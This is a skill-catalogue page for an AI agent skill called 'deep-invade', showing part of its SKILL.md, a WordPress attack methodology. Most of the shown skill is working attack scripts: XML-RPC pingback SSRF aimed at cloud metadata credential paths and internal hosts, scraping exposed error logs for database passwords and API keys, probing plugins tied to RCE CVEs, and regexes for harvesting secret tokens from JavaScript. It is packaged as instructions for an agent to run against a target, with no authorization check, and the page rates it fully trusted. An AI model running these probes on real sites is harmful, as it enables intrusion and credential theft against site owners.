deep-invade
Deep pentest WP: SSRF, plugin CVE, JS mine, port scan chain.
Install / Use
npx skills add uphiago/recon-skills --skill deep-invadeInstalls into whichever agent you are using.
SKILL.md
Installable skill definition
Quality Score
Category
SecuritySupported Platforms
Our assessment of deep-invade
deep-invade scores 90/100 on our quality scale, 457th of 971 Security skills we index (top 48%).
Its SKILL.md is 18 KB long, well organised into 49 sections with 10 code examples: a thorough specification that gives an agent plenty to work with.
With 1,280 GitHub stars, it is one of the more widely adopted skills in the catalogue.
Maintenance, license and trust
- The repository was last updated 29 days ago, so deep-invade is actively maintained.
- It is released under the MIT license, a permissive license that allows use, modification and commercial use with attribution.
- Its trust signals score 100/100, with no cautions. These come from repository metadata, not a code audit — read the skill file before letting an agent act on it.
deep-invade compared with similar skills
All 4 of these similar skills score higher than deep-invade; compare them before choosing.
| Skill | Score | Stars | Updated | Format |
|---|---|---|---|---|
| deep-invade (this skill)by uphiago | 90 | 1.3k | 29d ago | SKILL.md |
| Agent-Reachby Panniantong | 100 | 86.6k | 15d ago | CLAUDE.md |
| headroomby headroomlabs-ai | 100 | 74.2k | today | CLAUDE.md |
| Scraplingby D4Vinci | 100 | 84.8k | today | MCP Server |
| crawl4aiby unclecode | 100 | 84.6k | 6d ago | MCP Server |
Frequently asked questions
- How do I install deep-invade?
- Run
npx skills add uphiago/recon-skills --skill deep-invade. The install tabs above show the steps for each supported agent. - Which AI agents does deep-invade work with?
- It is written for Universal, as a SKILL.md file. Other agents that read the same format can often use it too.
- Is deep-invade safe to use?
- It is MIT-licensed and scores 100/100 on trust signals. Skills are instructions an agent will follow, so read the file before installing it and do not approve commands you do not understand.
- Is deep-invade still maintained?
- The repository was last updated 29 days ago, so deep-invade is actively maintained.
Skill content
View source on GitHubname: deep-invade description: "Deep pentest WP: SSRF, plugin CVE, JS mine, port scan chain." version: 1.1.0 revision_date: 2026-07-25 license: MIT platforms: [linux] compatibility: Requires curl, nmap, python3, httpx, nuclei tags: [recon, pentest, deep, SSRF, CVE, wordpress] category: recon related_skills:
- wp-mass-recon
- xmlrpc-exploitation
- error-log-mining
- js-secrets-extraction
- staging-subdomain-hunt
- wordpress-plugin-hunt
- port-service-discovery
- cors-credential-wordpress
- source-leak-hunt
- phpinfo-to-rce
Deep Invade Skill
Focused follow-up methodology for WordPress targets prioritized by
wp-mass-recon. It connects XML-RPC SSRF validation, exposed-log analysis,
plugin version review, JavaScript inspection, staging discovery, service
mapping, and API enumeration.
When to Use
wp-mass-reconscored a target >= 6 (CORS confirmed, XMLRPC open, source leaks found).- You are assigned a single high-value target for deep assessment.
- After surface recon, you need to find the chain that leads to RCE or data breach.
- Multiple independent signals justify a deeper, target-specific follow-up.
Prerequisites
curl,python3, and the tools required by each selected phase.- Target already scored >= 6 from wp-mass-recon (WordPress confirmed, at least 2 of: CORS/XMLRPC/source leak).
- Collaborator endpoint (Burp Collaborator, interactsh, or your own server) for SSRF/blind confirmation.
nmapavailable when port scanning is in scope.
How to Run
Execute probes in order. Each phase builds on the previous:
- Extended SSRF probe (XMLRPC pingback to IMDS, localhost, internal IPs)
- Error log mining (fetch and grep for creds, paths, SQL)
- Plugin CVE matrix (30+ REST namespaces, readme.txt versions)
- JavaScript bundle analysis (11 regex patterns for secrets)
- Subdomain/staging enumeration (crt.sh, httpx, WP install pages)
- Port scan (nmap -F for MySQL, FTP, SSH, internal APIs)
- API discovery (Swagger, GraphQL, WooCommerce, Gravity Forms)
Quick Reference
| Phase | Technique | Tool | Typical time |
|-------|-----------|------|--------------|
| 1 | XML-RPC SSRF validation with an authorized callback | curl + callback service | 2 min |
| 2 | Exposed error-log analysis | Python regex | 1 min |
| 3 | Plugin namespace and version review | curl + regex | 3 min |
| 4 | JavaScript bundle analysis | js-secrets-extraction | 2 min |
| 5 | Subdomain and staging comparison | crt.sh, httpx, curl | 5 min |
| 6 | Scoped port and service discovery | nmap | scope dependent |
| 7 | API description and route discovery | curl + regex | 2 min |
Procedure
Phase 1 — Extended SSRF Probe
TARGET="$1"
COLLAB="$2" # Your Burp Collaborator / interactsh URL
echo "[*] Phase 1: SSRF Probe"
# Test 1: Confirm pingback SSRF to your callback
curl --max-time 30 --connect-timeout 10 -sk -X POST "https://$TARGET/xmlrpc.php" -H "Content-Type: text/xml" \
-d "<?xml version=\"1.0\"?><methodCall><methodName>pingback.ping</methodName>
<params><param><value><string>$COLLAB</string></value></param>
<param><value><string>https://$TARGET/?p=1</string></value></param></params></methodCall>" | grep faultCode
echo "[*] Check Collaborator for callback — if received, SSRF confirmed"
# Test 2: AWS IMDSv1 (15 paths)
for path in "" "iam/security-credentials/" "iam/security-credentials/admin" \
"iam/security-credentials/ec2-admin" "iam/security-credentials/s3-full-access" \
"user-data/" "placement/availability-zone" "public-keys/0/openssh-key" \
"network/interfaces/macs/" "security-groups" "ami-id" "hostname" \
"instance-id" "mac" "profile"; do
result=$(curl --max-time 30 --connect-timeout 10 -sk -X POST "https://$TARGET/xmlrpc.php" -H "Content-Type: text/xml" \
-d "<?xml version=\"1.0\"?><methodCall><methodName>pingback.ping</methodName>
<params><param><value><string>http://192.0.2.1/latest/meta-data/$path</string></value></param>
<param><value><string>https://$TARGET/?p=1</string></value></param></params></methodCall>" 2>/dev/null | grep -o 'faultCode>[0-9]*')
code=$(echo "$result" | grep -o '[0-9]\+')
[[ "$code" == "0" ]] && echo "[SSRF] IMDS reachable: /$path" || echo "[--] IMDS blocked: /$path (faultCode=$code)"
sleep 0.5
done
# Test 3: Internal network probes
for ip in "127.0.0.1:80" "127.0.0.1:3306" "127.0.0.1:8080" "127.0.0.1:3000" \
"10.0.0.1:80" "172.16.0.1:80" "192.168.0.1:80" "localhost:22"; do
result=$(curl --max-time 30 --connect-timeout 10 -sk -X POST "https://$TARGET/xmlrpc.php" -H "Content-Type: text/xml" \
-d "<?xml version=\"1.0\"?><methodCall><methodName>pingback.ping</methodName>
<params><param><value><string>http://$ip/</string></value></param>
<param><value><string>https://$TARGET/?p=1</string></value></param></params></methodCall>" 2>/dev/null | grep -o 'faultCode>[0-9]*')
code=$(echo "$result" | grep -o '[0-9]\+')
[[ "$code" == "0" ]] && echo "[SSRF] Internal reachable: $ip" || true
sleep 0.5
done
Phase 2 — Error Log Mining
TARGET="$1"
echo "[*] Phase 2: Error Log Mining"
# Fetch error_log (can be multi-MB)
curl -sk --max-time 30 --connect-timeout 10 "https://$TARGET/error_log" -o /tmp/error_log_$TARGET.txt 2>/dev/null
curl -sk --max-time 30 --connect-timeout 10 "https://$TARGET/wp-content/debug.log" >> /tmp/error_log_$TARGET.txt 2>/dev/null
size=$(wc -c < /tmp/error_log_$TARGET.txt 2>/dev/null)
if [[ "$size" -gt 100 ]]; then
echo "[+] Error log found: ${size} bytes"
# Extract server paths
echo "[*] Server paths:"
grep -Eo '/[a-zA-Z0-9/_.-]+\.php' /tmp/error_log_$TARGET.txt 2>/dev/null | sort -u | head -20
# Extract email addresses
echo "[*] Email addresses:"
grep -Eo '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' /tmp/error_log_$TARGET.txt 2>/dev/null | sort -u | head -10
# Extract DB credentials
echo "[*] DB credentials:"
grep -iE 'mysql_connect|mysqli_connect|new PDO|DB_HOST|DB_USER|DB_PASSWORD|database.*password' /tmp/error_log_$TARGET.txt 2>/dev/null | head -5
# Extract SQL queries
echo "[*] SQL queries:"
grep -iE 'SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|JOIN' /tmp/error_log_$TARGET.txt 2>/dev/null | head -10
# Extract API keys
echo "[*] API keys:"
grep -iE 'api_key|api_secret|access_token|auth_token|bearer' /tmp/error_log_$TARGET.txt 2>/dev/null | head -5
# PHP error summary
echo "[*] Error summary:"
echo " Fatal: $(grep -ci 'Fatal error' /tmp/error_log_$TARGET.txt)"
echo " Warning: $(grep -ci 'Warning' /tmp/error_log_$TARGET.txt)"
echo " Notice: $(grep -ci 'Notice' /tmp/error_log_$TARGET.txt)"
echo " Deprecated: $(grep -ci 'Deprecated' /tmp/error_log_$TARGET.txt)"
# Date range
echo "[*] Date range:"
head -1 /tmp/error_log_$TARGET.txt | grep -Eo '\[\d{2}-[A-Za-z]{3}-\d{4}' 2>/dev/null
tail -1 /tmp/error_log_$TARGET.txt | grep -Eo '\[\d{2}-[A-Za-z]{3}-\d{4}' 2>/dev/null
else
echo "[-] No error log found"
fi
Phase 3 — Plugin CVE Matrix
TARGET="$1"
echo "[*] Phase 3: Plugin CVE Matrix"
# Probe 30+ plugin REST namespaces
declare -A PLUGINS
PLUGINS[revslider]="/wp-json/revslider/v1/slides|CVE-2024-2534 (RCE)|Slider Revolution"
PLUGINS[elementskit]="/wp-json/elementskit/v1/|CVE-2023-6851/6853 (RCE)|ElementsKit"
PLUGINS[elementor]="/wp-json/elementor/v1/globals|CVE-2024-xxxx (info disclosure)|Elementor"
PLUGINS[gravityforms]="/wp-json/gf/v2/forms|CVE-2024-6115 (auth bypass)|Gravity Forms"
PLUGINS[jetpack]="/wp-json/jetpack/v4/|CVE-2024-1782 (info disclosure)|Jetpack"
PLUGINS[litespeed]="/wp-json/litespeed/v1/|CVE-2024-50550 (privilege escalation)|LiteSpeed Cache"
PLUGINS[woocommerce]="/wp-json/wc/v3/products|API info disclosure|WooCommerce"
PLUGINS[yoast]="/wp-json/yoast/v1/|SEO data disclosure|Yoast SEO"
PLUGINS[acf]="/wp-json/acf/v3/|CVE-2023-xxxx (info disclosure)|Advanced Custom Fields"
PLUGINS[contactform7]="/wp-json/contact-form-7/v1/|Configuration leak|Contact Form 7"
PLUGINS[solidwp]="/wp-json/solidwp-mail/v1/|Mail log disclosure|SolidWP Mail"
PLUGINS[wpsl]="/wp-json/wpsl/v1/|Store locator data|WP Store Locator"
PLUGINS[redirection]="/wp-json/redirection/v1/|Redirect log exposure|Redirection"
PLUGINS[wpml]="/wp-json/wpml/v1/|Translation data|WPML"
PLUGINS[rankmath]="/wp-json/rankmath/v1/|SEO data|Rank Math"
for plugin in "${!PLUGINS[@]}"; do
IFS='|' read -r path cve name <<< "${PLUGINS[$plugin]}"
code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 --connect-timeout 5 "https://$TARGET$path" 2>/dev/null)
if [[ "$code" == "200" || "$code" == "401" || "$code" == "403" ]]; then
echo "[PLUGIN] $name ($plugin) — HTTP $code — $cve"
# If 200, try to get version from readme.txt
if [[ "$code" == "200" ]]; then
ver=$(curl -sk --max-time 5 --connect-timeout 5 "https://$TARGET/wp-content/plugins/$plugin/readme.txt" 2>/dev/null | grep -i "stable tag" | head -1)
[[ -n "$ver" ]] && echo " Version: $ver"
fi
fi
sleep 0.5
done
# Also probe readme.txt for elementor, revslider (common alternate paths)
for slug in "elementor" "revslider" "js_composer" "wp-rocket" \
"wordfence" "woocommerce" "jetpack" "litespeed-cache"; do
ver=$(curl -sk --max-time 5 --connect-timeout 5 "https://$TARGET/wp-content/plugins/$slug/readme.txt" 2>/dev/null | grep -i "stable tag" | head -1)
[[ -n "$ver" ]] && echo "[VERSION] $slug: $ver"
sleep 0.3
done
Phase 4 — JavaScript Secret Extraction
See skill_view(name='js-secrets-extraction') for full procedure. Quick scan:
TARGET="$1"
# Fetch homepage and common JS bundles
curl -sk --max-time 10 --connect-timeout 10 "https://$TARGET/" -o /tmp/page_$TARGET.html 2>/dev/null
JS_URLS=$(grep -Eo 'src="[^"]+\.js[^"]*"' /tmp/page_$TARGET.html 2>/dev/null | sed 's/src="//;s/"//' | head -10)
for js_url in $JS_URLS; do
# Make relative URLs absolute
[[ "$js_url" =~ ^// ]] && js_url="https:$js_url"
[[ "$js_url" =~ ^/ ]] && js_url="https://$TARGET$js_url"
content=$(curl -sk --max-time 10 --connect-timeout 10 "$js_url" 2>/dev/null)
# 11 regex patterns
echo "$content" | grep -Eo '(?:api_key|apiKey|API_KEY)["\s:=]+["'\''][A-Za-z0-9_-]{20,}'
echo "$content" | grep -Eo 'https?://[a-zA-Z0-9.-]+\.(?:amazonaws|cloudfront)\.(?:com|net)[^"'\''\s]*'
echo "$content" | grep -Eo 'eyJ[A-Za-z0-9_-]{20,}\.[A-Za-z0-9_-]{20,}\.[A-Za-z0-9_-]{20,}'
echo "$content" | grep -Eo 'AKIA[0-9A-Z]{16}'
echo "$content" | grep -Eo '[a-z0-9-]+\.firebaseio\.com'
echo "$content" | grep -Eo '[a-z0-9-]+\.supabase\.co'
echo "$content" | grep -Eo 'sk_live_[0-9a-zA-Z]{24,}'
echo "$content" | grep -Eo 'ghp_[0-9a-zA-Z]{36}'
echo "$content" | grep -Eo 'xox[bprs]-[0-9a-zA-Z-]+'
echo "$content" | grep -Eo '(?:10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|192\.168\.)\d{1,3}\.\d{1,3}'
echo "$content" | grep -Eo 'AIza[0-9A-Za-z_-]{35}'
sleep 0.3
done | sort -u
Phase 5 — Subdomain/Staging Discovery
See skill_view(name='staging-subdomain-hunt') for full procedure. Quick scan:
TARGET="$1"
DOMAIN=$(echo "$TARGET" | sed 's|https\?://||')
echo "[*] Phase 5: Subdomain/Staging Discovery"
# crt.sh certificate transparency
curl --max-time 30 --connect-timeout 10 -sk "https://crt.sh/?q=%25.$DOMAIN&output=json" 2>/dev/null | \
jq -r '.[].name_value' 2>/dev/null | sed 's/\*\.//g' | sort -u > /tmp/subs_$DOMAIN.txt
sub_count=$(wc -l < /tmp/subs_$DOMAIN.txt)
echo "[+] crt.sh: $sub_count subdomains"
# Filter for interesting ones
echo "[*] Interesting subdomains:"
grep -iE 'staging|stage|dev|test|uat|beta|old|new|admin|portal|api|app|dashboard' /tmp/subs_$DOMAIN.txt | head -20
# Probe them for WordPress install pages (staging takeover vector)
echo "[*] Staging takeover check:"
for sub in $(grep -iE 'staging|stage|dev' /tmp/subs_$DOMAIN.txt | head -5); do
for path in "/wp-admin/install.php" "/wp-admin/upgrade.php" "/wp-admin/setup-config.php"; do
code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 --connect-timeout 5 "https://$sub$path" 2>/dev/null)
[[ "$code" == "200" ]] && echo
Truncated for display — read the full file on GitHub.
Related Skills
Agent-Reach
86.6kGive your AI agent eyes to see the entire internet. Read & search Twitter, Reddit, YouTube, GitHub, Bilibili, XiaoHongShu — one CLI, zero API fees.
headroom
74.2kCompress tool outputs, logs, files, and RAG chunks before they reach the LLM. 20% fewer tokens for coding agents, 60-95% fewer tokens for JSON, same answers. Library, proxy, MCP server.
Scrapling
84.8k🕷️ An adaptive Web Scraping framework that handles everything from a single request to a full-scale crawl! Don't be shy, join here: https://discord.gg/EMgGbDceNQ and follow here for daily tips and tricks: https://x.com/Scrapling_dev
crawl4ai
84.6kOpen-source web crawler and scraper for LLMs and AI agents: any website into clean, LLM-ready Markdown. Run it yourself, or use Crawl4AI Cloud with one key.
Languages
Trust signals
From repository metadata: license, adoption, age and documentation. Not a code audit — see the Safety scan above for what the skill file itself contains.
